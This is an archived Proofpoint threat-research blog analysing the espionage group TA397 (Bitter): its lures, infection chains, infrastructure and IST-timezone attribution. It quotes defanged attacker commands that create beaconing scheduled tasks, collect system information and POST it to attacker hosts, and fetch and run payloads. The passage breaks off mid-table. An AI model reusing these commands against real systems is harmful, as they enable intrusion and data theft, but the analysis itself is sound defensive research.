{ "id": "f605cecb-5bc6-4cb8-a341-ed86c8185af2", "created_at": "2026-04-06T00:16:17.499109Z", "updated_at": "2026-04-10T03:33:56.939143Z", "deleted_at": null, "sha1_hash": "731646b712fba1e4210f2dd355a839bd4a31b1ec", "title": "The Bitter End: Unraveling Eight Years of Espionage Antics—Part One | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2011592, "plain_text": "The Bitter End: Unraveling Eight Years of Espionage Antics—Part One |\r\nProofpoint US\r\nPublished: 2025-06-03 · Archived: 2026-04-02 11:32:18 UTC\r\nJune 04, 2025 Nick Attfield and Konstantin Klinger in collaboration with Threatray’s Abdallah Elshinbary and Jonas\r\nWagner\r\nThis is a two-part blog series, detailing research undertaken in collaboration with Threatray. Part two of this blog series can\r\nbe found on their website here. \r\nAnalyst note: Throughout this blog, researchers have defanged TA397-controlled indicators and modified certain technical\r\ndetails to protect investigation methods. \r\nKey findings \r\nProofpoint Threat Research assesses it is highly likely that TA397 is a state-backed threat actor tasked with\r\nintelligence gathering in the interests of the Indian state. \r\nThe group frequently experiments with their delivery methods to load scheduled tasks. However, the resulting\r\nscheduled tasks, PHP URL patterns, inclusion of a victim’s computer name and username in the beaconing, and Let’s\r\nEncrypt certificates on attacker servers provide a high confidence fingerprint of detecting the group’s activity.  \r\nTA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan,\r\nand other neighboring countries on the Indian subcontinent.  \r\nTA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian\r\nStandard Time (IST) timezone.  \r\nOverview \r\nTA397 (Bitter) is an espionage group with a long history of targeting South Asian entities. While the group is frequently\r\nattributed to India (non-publicly), the reasoning behind this is not clearly documented. In this blog we share evidence\r\nshowing TA397 to be an India-aligned threat actor and release previously undisclosed evidence of the group’s targeting\r\noutside of Asia. In part one of this blog series, we explore TA397’s campaigns, targeting, and payload delivery and conduct\r\nan in-depth analysis of TA397’s infrastructure. Part two of this blog series expands on this research with a deep dive into\r\nTA397’s entire observed malware arsenal, highlighting how the group’s capabilities support its espionage operations. Our\r\njoint research with the Threatray research team aims to substantiate the claim that TA397 is an espionage-focused, state-backed threat actor, tasked with intelligence gathering in the interests of the Indian state. \r\nTA397’s Operations \r\nThis section covers some of the campaigns observed by Proofpoint Threat Research from October 2024 to April 2025 that\r\nwe have attributed to TA397. Campaigns referenced throughout part one of this blog fall within this timeframe. This section\r\ncovers the group’s targeting, the types of email accounts used to deliver phishing emails, the subjects employed to blend\r\nwith legitimate traffic, the lures crafted to entice targets to engage with attachments or links, and finally TA397’s infection\r\nchains that used to deploy malicious payloads on targets of interest.  \r\nProofpoint Threat Research also has unique insight into what hands-on-keyboard activity looks like from the group. The\r\ndata presented in this blog provides a new lens from which to analyze victimology and highlights the fact that the group has\r\na much wider pool of collection targets than previously documented. \r\nCampaigns, victimology, and lures \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 1 of 17\n\nTracking and analyzing TA397’s activity over an extended period surfaces several observable behavioral patterns displayed\r\nby the group. These patterns provide threat researchers with many opportunities to monitor and detect TA397’s activity.  \r\nProofpoint has observed TA397 frequently targeting an exceedingly small subset of targets. Geographically, this targeting is\r\nalso almost exclusively observed against European entities with links to China or India’s neighbors, with some targeting also\r\nobserved in China and South America. While this is likely more indicative of visibility bias, most public reporting on the\r\ngroup details TA397’s activities against organizations in Asia.  \r\nThe TA397 targeting verticals we have observed are also highly characteristic of espionage-focused threat actors.\r\nGovernments, diplomatic entities, and defense organizations are frequently targeted to enable intelligence collection on\r\nforeign policy or current affairs, in addition to providing threat actors potential insight into a government’s position or\r\ndecision-making process on political issues, trade negotiations, defense contracts, or wider economic investments. When\r\nanalyzing targeting and attributing clusters of threat activity, the topics and themes will almost certainly map onto the\r\ngeopolitical, economic, or military interests of the threat actor’s suspected country of origin. The targets, subjects, and lures\r\nof TA397’s campaigns exhibit these same qualities, which are consistent with activity that is in the intelligence interests of\r\nthe Indian state. \r\nTA397 uses a swathe of different email accounts to carry out its operations. The group has shifted between freemail\r\nproviders – 163[.]com, 126[.]com, and ProtonMail – and various compromised accounts belonging to the governments of\r\nPakistan, Bangladesh, and Madagascar. Within these campaigns, TA397 has been seen masquerading or spoofing various\r\nentities within the Chinese government, the Embassy of Mauritius in China, the Embassy of Madagascar in China, the\r\nMinistry of Foreign Affairs of the Republic of Korea, and the Foreign Affairs Office in Beijing to name a few. The subject\r\nlines employed alongside TA397’s sender accounts provide insight into topics, themes, and events specific to either the\r\ngroup’s or the targets’ interests. Some of the subjects that Proofpoint has observed in TA397’s campaigns are shown below: \r\nAUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL\r\nREPRESENTATIONS \r\nPUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR \r\nSituationNote : SouthKorea_Martial law Seoul Embassy Advisory \r\nInvitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024. \r\nEU Delegation \r\nKey National Defense R\u0026D Projects \r\nNote from Embassy of Mauritius 13 December 2024 \r\nFw:Fw:CN_5896_File_vers1 \r\nFw: A/c Records : Beijing \r\nFw: Preferential Visa Rules Updates 2025 \r\nProtocol Guidelines for Diplomatic Missions \r\nDepartment of Northeast Asia, Ministry of Foreign Affairs \r\nInvitation Armed Forces Day \r\nRe: Intermediate structure WA's \r\nMinistry of Commerce File \r\nEspionage-focused threat actors frequently operate in the realm of politics, diplomacy, trade, investment, and defense. Based\r\non Proofpoint’s visibility of the group’s activity, TA397 is no different. As shown above, there are some subjects purportedly\r\ndiscussing matters relevant to European organizations involved in diplomacy. There are also many subject lines pertaining to\r\ndiplomatic or military issues in China, Pakistan, and Northeast Asia. One campaign aligned with the timing of the crisis in\r\nDecember 2024 when South Korea’s president instituted martial law where the subject – “SituationNote :\r\nSouthKorea_Martial law Seoul Embassy Advisory” – clearly demonstrates how threat actors attempt to blend in with\r\nlegitimate email traffic by leveraging topical themes and content the target is likely to read or see in their inbox. \r\nThere are two campaigns that are particularly interesting given TA397’s suspected attribution. The campaigns with the\r\nsubjects “PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” and “Note from Embassy of Mauritius 13\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 2 of 17\n\nDecember 2024” both show TA397 attempting to appear as if the emails were legitimately from the Malagasy and Mauritian\r\nembassies respectively (despite using a Chinese freemail address in the campaign where the sender claimed to be the\r\nMauritian embassy in China). \r\nExample TA397 lure email containing a RAR-enclosed CHM attachment.  \r\nThis targeting may reflect that both Madagascar and Mauritius are strategic partners of India, with relationships spanning\r\nacross trade, energy, infrastructure, and more. Furthermore, as of early 2024 into 2025, India has engaged in “joint naval\r\nexercises, coordinated patrols, information sharing, HADR efforts, capacity building and other diplomatic engagements”\r\nwith both Madagascar and Mauritius on multiple occasions. Based on the content and the decoy documents employed, it is\r\nclear that TA397 has no qualms with masquerading as other countries’ governments, including Indian allies. While TA397’s\r\ntargets in these campaigns were Turkish and Chinese entities with a presence in Europe, it signals that the group likely has\r\nknowledge and visibility into the legitimate affairs of Madagascar and Mauritius and uses the material in spearphishing\r\noperations. \r\nMany espionage-focused threat actors often send decoy documents or accompanying files alongside initial access payloads,\r\nor links to mislead targets and convince them of the legitimacy of the email. Over the last year however, Proofpoint has only\r\nobserved TA397 doing this in two instances, in a previously published campaign targeting an organization in the Turkish\r\ndefense sector, and a campaign targeting European entities located in China. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 3 of 17\n\nFalse document lure to add legitimacy to phishing email containing a malicious attachment. \r\nThe rest of the campaigns TA397 has carried out simply contained plain-text body messages where the group masqueraded\r\nas a legitimate government organization, with an accompanying malicious attachment or URL. This choice demonstrates an\r\noverall lack of maturity in the group’s phishing operations compared to many other state-backed threat actors. \r\nInfection chain \r\nTA397 may not display advanced capabilities, but the group is highly active, carrying out frequent and consistent\r\ncampaigns. While the group has a “tried and true” methodology that it always seem to fall back on, TA397 has also\r\ndemonstrated an ability to experiment with novel infection chains to bypass detections or exploit vulnerabilities. \r\nInitial access \r\nSpearphishing emails remain TA397’s preferred technique for initial access, and to date, we are not aware of any reports\r\nindicating the use of alternative methods by this group. That said, the group’s spearphishing tactics have evolved and\r\ndemonstrate a degree of flexibility. While in 2019/2020, TA397 relied on exploiting CVEs, used ArtraDownloader to deploy\r\nadditional payloads, and even experimented with Android malware, the group has consistently shown a preference for\r\nscheduled tasks in recent years, as reported by Proofpoint, Ahnlab, StrikeReady Labs, Cisco Talos, and others. In historical\r\noperations, ArtraDownloader encoded both the username and the computer name of the infected machine within the\r\nHTTP(S) POST C2 beacon. This data was sent to the C2 server on a regular basis, presumably allowing the actor to\r\nmanually assess whether the victim met certain targeting criteria, and if so, deliver a second-stage payload. TA397 continues\r\nto follow the same approach today using scheduled tasks (detailed below). \r\nThe emails in the campaigns we observed typically contained either a direct attachment or a URL that leveraged a legitimate\r\nfile-sharing service to deliver a file, which then launched a scheduled task. Even when a file was directly attached to the\r\nemail, it ultimately resulted in the creation of a scheduled task. In some cases, the file was packaged within an archive\r\nbefore execution as the actors experimented with more advanced techniques. \r\nFor example, in late 2024 shortly after the usage of alternate data streams in NTFS file systems, Proofpoint observed TA397\r\nusing an esoteric file type: Microsoft Search Connector (MSC) files, which allow users to connect with data stored in web\r\nservices or remote storage locations. This was a new tactic for the group to drop and launch LNK files to the infected\r\nmachine and create scheduled tasks. We cover this chain in more detail below, including the follow-on hands-on-keyboard\r\nactivity. These search connectors are Microsoft XML files and are abused in a similar way to library files or saved search\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 4 of 17\n\nfiles. Abusing WebDAV for payload downloads has become a trend with various groups in the threat landscape over the past\r\nyears. This specific search connecter technique was reported to be a security risk in 2023, but first observed use by TA397\r\nwas in late 2024. \r\nAnother esoteric file type was observed in a TA397 campaign in late 2024. The emails contained a RAR archive with an\r\nMSC file inside. If double clicked and run by the user, the MSC started mmc.exe, which set up a scheduled task that\r\nattempts to use PowerShell to download and run the next stage payload. In this campaign, TA397 exploited CVE-2024-\r\n43572, otherwise known as GrimResource, which is a vulnerability that provides attackers remote code execution in the\r\ncontext of mmc.exe on targeted endpoints. This vulnerability was first publicly reported in June 2024, and Threat Research\r\nfirst observed TA397 using this file type in October 2024. \r\nOver a period of years, TA397 has experimented with various methods for dropping or creating a scheduled task. However,\r\nthe scheduled task itself remains largely unchanged, which we will highlight in the next section. Among the file types used\r\nto initiate scheduled tasks via cmd.exe or PowerShell are MSC, LNK, CHM, MS Access, IQY files, and others. \r\nSince Proofpoint began tracking TA397 in 2021, we have not observed the group using zero-day vulnerabilities or\r\ntechniques that haven’t already been publicly disclosed or reported. The group likely also monitors the threat landscape and\r\nfollows a “tried and true” approach with initial access payloads, using whatever proves effective. The group maintains\r\nconsistency in the scheduled task method but tends to vary when it comes to the final payload (see later chapters). \r\nThe graphic below provides a general overview of the initial access infection chains observed: \r\nOverview of TA397’s infection chains. \r\nScheduled tasks \r\nThe following example of a scheduled task command line shows how the task beaconed every 16 minutes to the staging\r\ndomain woodstocktutors[.]com, awaiting instructions to retrieve the next-stage payload. When these samples were executed\r\nin a sandbox environment, no additional payloads were delivered. However, when allowed to run for a longer period, a next-stage payload was eventually dropped. This behavior appeared to be manual, likely triggered by the actor after evaluating\r\ncertain selection criteria – such as the victim’s IP address, computer name, and username, which were sent to the server via\r\nthe beacon. \r\n\"C:\\\\Windows\\\\System32\\\\conhost.exe\" --headless cmd /c ping\r\nlocalhost \u003e nul \u0026 schtasks /create /tn \"EdgeTaskUI\" /f /sc\r\nminute /mo 16 /tr \"conhost --headless powershell -WindowStyle\r\nMinimized irm \"woodstocktutors[.]com/jbc.php?\r\nfv=$env:COMPUTERNAME*$env:USERNAME\" -OutFile\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 5 of 17\n\n\"C:\\\\Users\\\\public\\\\kwe.cc\"; Get-Content\r\n\"C:\\\\Users\\\\public\\\\kwe.cc\" | cmd\"\r\nThe group experimented with various PowerShell and command-line tools (e.g. curl, conhost, etc.) and obfuscation\r\nmethods, but the core functionality remained consistent. Below is another example featuring an obfuscated PowerShell\r\ncommand that created a scheduled task beaconing every 18 minutes to princecleanit[.]com: \r\nschtasks /create /tn \\\\\"Task-S-1-5-42121\\\\\" /f /sc minute /mo 18\r\n/tr \\\\\"conhost --headless cmd /v:on /c set gz=ht\u0026 set gtz=tps:\u0026\r\nset 7gg=!gz!!gtz!\u0026 set 6hg=!7gg!//p^rin^ce^cle^anit.co^m\u0026 c^ur^l\r\n!6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\\\\\"\r\nAs part of our ongoing tracking of the group, Proofpoint Threat Research identified a signature for TA397 when creating\r\nscheduled tasks. The way the group structured PHP URI requests to staging infrastructure with a combination of computer\r\nname and username, with varying characters between, may have been an effort to throw off static detections. This has been\r\nconsistent for years, as shown by the examples below observed in historical TA397 campaigns. \r\nblucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nhxxp://46.229.55[.]63/svch.php?li=%computername%..%username%\r\nhxxp://95.169.180[.]122/vbgf.php?mo=%computername%--%username%\r\nhxxp://inizdesignstudio[.]com/lk.php?xm=$env:computername*$env:username\r\nhxxp://trkswqsservice[.]com/turf.php?xm=$env:COMPUTERNAME*$env:USERNAME\r\nhxxp://woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nhxxps://princecleanit[.]com/dprin.php?dr=%computername%;%username%\r\nhxxps://utizviewstation[.]com/dows.php?cb=$env:COMPUTERNAME*$env:USERNAME\r\nhxxps://www[.]headntale[.]com/lchr.php?ach=%computername:~0,15%_%username:~0,5%\r\nhxxps://www.mnemautoregsvc[.]com/GIZMO/flkr.php?sa=COMPUTERNAME**USERNAME\r\njacknwoods[.]com/jacds.php?jin=%computername%_%username%\r\nutizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nwarsanservices[.]com/mydown.php?dnc=%username%_%computername%\r\nwarsanservices[.]com/myupload.php?dnc=%username%_%computername%\r\nInspection of the TLS certificates used by these staging domains revealed that most of them relied on standard Let’s Encrypt\r\ncertificates. We performed a timestamp analysis on these certificates, as detailed in the infrastructure analysis section. \r\nHere is an example for the princecleanit[.]com staging domain: \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 6 of 17\n\nprincecleanit[.]com TLS certificate from Censys. \r\nTypical characteristics: \r\nSubject DN: CN=*.\u003cdomain\u003e \r\nIssuer DN: C=US, O=Let’s Encrypt, CN=R[0-9]+ \r\nValidity Period: 90 days \r\nThese present detection opportunities for the initial access techniques of this actor: the consistent use of scheduled tasks, the\r\nspecific PHP URL pattern, the inclusion of the victim’s computer name and username in the beacon, and the presence of a\r\nLet’s Encrypt certificate on the server side. Collectively these form a high confidence fingerprint and strongly suggest the\r\nactivity is attributable to TA397. \r\nFingerprint of TA397’s scheduled tasks and infrastructure. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 7 of 17\n\nHands-on-keyboard activity \r\nDuring our research, we observed TA397 engaging in hands-on-keyboard activity. Specifically, the group dropped a RAT,\r\nfollowed shortly by a second one. It is highly likely this was direct manual activity by the actor during a traditional work\r\nschedule in India. \r\nAs covered in Proofpoint’s previous blog on TA397, where we detailed the manual deployment of wmRAT and MiyaRAT,\r\nwe have since observed TA397 engaging in hands-on-keyboard activity in two distinct campaigns targeting government\r\norganizations. \r\nThe first case was the previously highlighted campaign using the search connecter file format, in which the group used this\r\nnovel technique to drop an LNK file that would load a scheduled task on a target machine. \r\n\"C:\\\\Windows\\\\System32\\\\cmd.exe\" /start min /c schtasks /create /tn\r\n\"OneDrive\\\\OneDrive Standalone Update\r\nTask-S-1-5-21-9920643986-2299988379\" /f /sc minute /mo 19 /tr \"conhost\r\n--headless cmd /v:on /c set 765=ht\u0026 set 665=tp:\u0026 set\r\n565=!765!!665!\u0026 set 465=!565!//46.229.55[.]63\u0026 curl\r\n!465!/sv^c^h.p^h^p?li=%computername%..%hostname%c^m^d\"\u0026 msg * \"ERROR\r\n0XA008CE : ERROR reading File, contents are corrupted.\"\r\nThis LNK file used cmd.exe to set up a scheduled task named “OneDrive\\\\OneDrive Standalone Update Task-S-1-5-21-\r\n9920643986-2299988379,\" which attempted to use conhost.exe to download and run the next stage payload every 19\r\nminutes. To do so, the scheduled task created a curl request to hxxp://46.229.55[.]63/svch[.]php?\r\nli=%computername%..%username% providing details of the affected target machine. It also displayed a decoy error\r\nmessage to the user saying that the original file cannot be viewed. \r\nThis scheduled task was left beaconing for 18 hours until Proofpoint first observed a response from TA397 at 05:27 UTC\r\n(10:57 IST): \r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 05:27:59 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 330\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n \r\ncd C:\\\\programdata\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\nwmic /namespace:\\\\\\\\root\\\\SecurityCenter2 path AntiVirusProduct get \u003e\u003eabc1.pdf\r\nwmic logicaldisk get caption \u003e\u003e abc1.pdf\r\nsysteminfo \u003e\u003e C:\\\\programdata\\\\abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\nThis enumeration was essentially identical to the one that Proofpoint detailed in our previous blogpost on TA397, with the\r\naddition of the systeminfo command. In the request, the actor issued a POST request with this target machine information to\r\na different PHP endpoint on the staging domain:\r\n/svupfl[.]php?oi=%computername%_%username%.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 8 of 17\n\nEighteen minutes later, we observed this request: \r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 05:46:59 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 381\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n \r\ncd C:\\\\programdata\r\nset /P =\"MZ\" \u003c nul \u003e\u003e sh1.txt\"\r\ncurl -o sh2.txt \u003chxxp://173.254.204[.]72/sh2.txt\u003e\r\ncopy /b sh1.txt+sh2.txt shh.exe\r\ncurl -o dune64.log \u003chttp://173.254.204[.]72/dune64.log\u003e\r\nren dune64.log dune64.bin\r\nshh.exe dune64.bin\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\n \r\nIn this case, TA397 operators made an error by issuing a curl command that attempted to retrieve a payload from:\r\nhxxp://173.254.204[.]72/dune64.log\r\nHowever, this request returned a 404 error as the attackers had not placed a file with that name on their server – making the\r\nrename command and the execution of shh.exe fail. Instead, it turned out that the next stage was present under /dune64.bin.\r\nWhen Proofpoint analysts executed the shh.exe payload alongside the dune64.bin binary, the full chain executed correctly.\r\nAnalysis of these payloads allowed us to identify shh.exe as KugelBlitz and dune64.bin as the Demon agent from the Havoc\r\nC2 framework. This variant was found to be communicating with 72.18.215[.]108 over port 443. \r\nAfter the actor’s initial attempt to load the backdoor failed, we observed another request at 08:57 UTC (14:27 IST): \r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 08:57:00 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 263\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n \r\ncd C:\\\\programdata\r\nnet use Z: \\\\\\\\72.18.215[.]1\\\\tempy\r\nZ:\r\nZ:\\\\shl.exe dune64.bin\r\nC:\r\nnet use /delete Z: /y\r\nwhoami\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 9 of 17\n\nIn this case, TA397 attempted to execute the same chain as three hours prior, this time opting to pull the full payloads from a\r\nseparate actor-controlled server, by mounting an SMB share called tempy. By enumerating this share, Proofpoint was able to\r\nidentify that TA397 was also storing wmRAT and MiyaRAT payloads on the drive, the exact same binaries we blogged\r\nabout in December 2024. Furthermore, within TA397’s drive, Proofpoint found two documents that may have been\r\nexfiltrated from victims. \r\nThe first document was a scanned copy of an official government tax document from Bangladesh. We have redacted this\r\ninformation from the blog for anonymity and safety purposes. The second, was a strategic military document and appeared\r\nto originate from a military organization of Bangladesh. For these reasons, we have elected to omit it from this publication.\r\nThese documents both appeared to be photocopies or scans of handwritten documents. Both documents are likely legitimate,\r\nand it is highly likely they were exfiltrated from TA397 victims. This targeting is consistent with TA397’s historical activity\r\nand reinforces that both organizations are regular collection targets for TA397’s espionage activities. \r\nThe second case of hands-on-keyboard activity Proofpoint observed was in a more common infection chain for the group\r\nusing CHM files. \r\nThe email appeared to be a thread with another recipient to make the attachment appear more legitimate. The email\r\ncontained a RAR compressed CHM file. If double-clicked and run by the user, the CHM set up a MSTaskUI scheduled task\r\nthat attempted to use PowerShell through conhost.exe to download and run the next stage payload every 16 minutes with the\r\ncurl utility. \r\n\"C:\\\\Windows\\\\System32\\\\conhost.exe\" --headless cmd /c ping\r\nlocalhost \u003e nul \u0026 schtasks /create /tn \"MSTaskUI\" /f /sc minute\r\n/mo 16 /tr \"conhost --headless powershell -WindowStyle Minimized\r\nirm \"utizviewstation[.]com/sdf.php?\r\nfv=$env:COMPUTERNAME*$env:USERNAME\" -OutFile\r\n\"C:\\\\Users\\\\public\\\\documents\\\\vfc.cc\"; Get-Content\r\n\"C:\\\\Users\\\\public\\\\documents\\\\vfc.cc\" | cmd\"\r\nProofpoint observed TA397 operators respond to these ongoing scheduled task requests with manual commands at 10:40\r\nUTC (16:20 IST), issuing a command that enumerated the target machine and sent a POST request containing that\r\ninformation. \r\ntree \"%userprofile%\\\\Desktop\" /f \u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\nsysteminfo \u003e\u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\nWMIC /Node:localhost /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /\r\nwmic logicaldisk get name \u003e\u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\ncd C:\\\\Users\\\\Public\\\\Documents\r\ncurl -X POST -F \"file=@d.log\" hxxps://www.utizviewstation[.]com/urf.php?mn=%computername%\r\ndel d.log\r\nSimilar to previously observed hands-on-keyboard activity seen from the group, the POST request containing the infected\r\nmachine’s information was directed to the same staging domain, but a different PHP URI /urf.php?mn=%computername%\r\nthan the scheduled task. Proofpoint has observed TA397 refraining from dropping next-stage payloads depending on the\r\nsystem information provided on the infected machine. It is likely that the computer name and information sent to the staging\r\ndomain within the scheduled tasks undergo some form of pre-filtering. This selection criterion is similar to what was\r\nreported regarding the earlier use of ArtraDownloader. This is also likely why the actors remained consistent in their use of\r\nscheduled tasks, while varying their initial access methods and final payloads. Their selection criteria is a crucial part of\r\ntheir overall process and indicative of the highly targeted nature of espionage. \r\nAt 13:37 UTC (19:07 IST) we observed this response from the attacker server: \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 10 of 17\n\ncurl -o C:\\\\ProgramData\\\\msuitl.tar hxxp://utizviewstation[.]com/msuitl.tar\r\ncd C:\\\\ProgramData\r\ntar -xvf msuitl.tar\r\ndir \u003e t0.log\r\nmsuitl.exe\r\ntasklist \u003e\u003e t0.log\r\ncurl -X POST -F \"file=@t0.log\" hxxps://www.utizviewstation[.]com/urf.php?mn=%username%\r\ndel t0.log\r\n \r\nThis issued a request to the /msuitl.tar endpoint on the domain, dropping the final payload: \r\nHTTP/1.1 200 OK\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=100\r\ncontent-type: application/x-tar\r\nlast-modified: Mon, 03 Feb 2025 11:23:10 GMT\r\naccept-ranges: bytes\r\ncontent-length: 45568\r\ndate: Mon, 03 Feb 2025 13:37:21 GMT\r\nserver: LiteSpeed\r\nCache-Control: no-cache\r\n \r\nmsuitl.exe\r\nAs seen from the response headers, the endpoint was modified 43 minutes after the initial enumeration of the infected\r\nmachine, suggesting TA397 made a conscious decision to load a hand-picked payload to the staging infrastructure. It is\r\nlikely this payload selection is directly correlated to target selection and information gleaned from initial enumeration.The\r\nfinal payload of this campaign turned out to be BDarkRAT, which can be found in part two of this post on Threatray’s blog. \r\nWhile TA397’s initial access vector has consistently been spearphishing emails and the first part(s) of the group’s intrusion\r\nchains have varied between a handful of techniques, the breadth of malware payloads the group has been observed\r\ndeploying is significant. \r\nThe following image plots the timestamps of our observed hands-on-keyboards activity over a Monday to Friday working\r\nhours schedule in Indian Standard Timezone (IST): \r\nHeatmap of observed hands-on-keyboard activity timestamps. \r\nInfrastructure analysis \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 11 of 17\n\nTimezone analysis has proven to be a successful method for attributing espionage groups—not only for Asian espionage\r\ngroups, but also specifically for TA397, as demonstrated by Bitdefender in 2020, and during our observations of hands-on-keyboard activity. In the Bitdefender research, analysis of the creation timestamps of code-signing certificates used in\r\nTA397 malware, as well as ZIP file timestamps for samples, revealed that they mapped to Indian Standard Time (UTC\r\n+5:30) and followed a 9-to-5, Monday-to-Friday working schedule. \r\nFor this research, we collected 122 known TA397 C2 and staging domains from internal telemetry, pivoting, and public\r\nreports, spanning several years since the group was first publicly reported. For each domain (when available), we gathered\r\nthe following three timestamps: and public reports, spanning several years since the group was first publicly reported. For\r\neach domain (when available), we gathered the following three timestamps: \r\nPassive DNS first seen timestamp; \r\nDomain creation timestamp from WHOIS data; \r\nTLS certificate creation timestamp from Let’s Encrypt certificate. \r\nExample data: \r\nDomain \r\nCampaign\r\nDate \r\nPassive\r\nDNS \r\nWHOIS  Certificate  Staging URL \r\nblucollinsoutien[.]com \r\n2025-04-\r\n01 \r\n2025-\r\n03-11\r\n13:09:43\r\nIST \r\n2025-03-\r\n11\r\n13:06:44\r\nIST \r\n2025-03-11\r\n13:08:45\r\nIST \r\n/jbc.php?\r\nfv=$env:COMPUTERNAME*$env:USERNAM\r\nprincecleanit[.]com \r\n2025-03-\r\n26 \r\n2025-\r\n01-03\r\n14:16:21\r\nIST \r\n2025-01-\r\n02\r\n15:27:04\r\nIST \r\n2025-01-02\r\n15:30:00\r\nIST \r\n/dprin.php?dr=COMPUTERNAME;USERNAM\r\nAfter converting all timestamps to Indian Standard Time (IST), we generated three separate heatmaps—one for each data\r\nsource. For better visualization, the standard “working hours” are marked with dotted lines. The data largely aligns with this\r\npattern or at least suggests a clear trend. \r\nPassive DNS: \r\nHeatmap of Passive DNS first seen timestamps. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 12 of 17\n\nSince there can be a delay between domain registration and the first seen timestamp recorded in passive DNS databases for a\r\nvariety of reasons, the presence of outliers is not unexpected. \r\nWHOIS: \r\nHeatmap of WHOIS domain registration timestamps. \r\nWHOIS data provides information about domain registrations. For this research, we queried the WHOIS database directly.\r\nSince we are working with historical data, the domain creation date was not always available for every domain included in\r\nthe study (e.g. removed from the database following domain expiry). The data shows that “lunch hour” on Friday stands out,\r\nas the actor registered multiple domains within minutes of each other on the same day. Logically, this suggests that a\r\nmember of the infrastructure team likely registered several domains in a single “session” rather than just one at a time. \r\nCertificate: \r\nHeatmap of Let’s Encrypt certificate valid from timestamps. \r\nFor this research, we used Censys to locate the TLS certificates associated with each domain and queried the certificate\r\ncreation timestamp. We only included data points where a Let’s Encrypt certificate was used, as this has previously been\r\nidentified as an indicator of this group’s infrastructure. One of the challenges we faced was that some of the historical C2\r\nand staging domains were no longer active – either expired or re-registered – so selecting the correct Let’s Encrypt\r\ncertificate was critical to ensure accurate analysis. Some registrars and providers offer services that automatically renew\r\nexpired certificates or issue a TLS certificate upon domain registration. The domains analyzed in this research span a variety\r\nof hosting providers. \r\nCombining all data sources into a single heatmap yields the following result: \r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 13 of 17\n\nCombined heatmap of Passive DNS, WHOIS and certificate timestamps. \r\nThere is a visible variation between domain creation and TLS certificate issuance. Below are two example data points – one\r\nfor a C2 domain and one for a staging domain – where the domain was registered several days before the corresponding TLS\r\ncertificate was issued. The associated campaign activity began several days after that. All timestamps align with India\r\nStandard Time, and there is a clear indication that most infrastructure-related activity occurs during standard business hours\r\nin that timezone. \r\nDomain \r\nPassive\r\nDNS \r\nWHOIS  Certificate  Source / Campaign \r\nutizviewstation[.]com \r\n2025-\r\n01-03\r\n17:04:43\r\nIST \r\n2025-01-\r\n03\r\n14:31:26\r\nIST 